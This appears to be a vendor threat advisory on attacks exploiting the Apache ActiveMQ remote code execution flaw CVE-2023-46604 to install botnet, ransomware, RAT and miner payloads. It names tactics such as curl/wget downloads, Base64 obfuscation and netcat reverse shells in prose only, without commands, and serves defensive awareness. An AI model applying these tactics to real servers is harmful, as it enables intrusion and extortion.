High
Attackers have been exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ, enabling them to deploy various malicious payloads like Mirai Botnet, HelloKitty Ransomware, SparkRAT, and XMRig. This vulnerability affects both Apache ActiveMQ Artemis and Classic versions, allowing attackers to execute unauthorized code due to insecure deserialization of the OpenWire protocol. The attacks involve tactics like using curl and wget for payload downloads, Base64 encoding for command obfuscation, employing 'nohup' to prevent process termination, and utilizing netcat for creating reverse shells to interact with the compromised host. The Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Cybereason and shared publicly https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
Detection rate is the number of artifact detections reported by McAfee global sensors for this threat over 4 days.
The detection rate bubbles are sized based on the values below: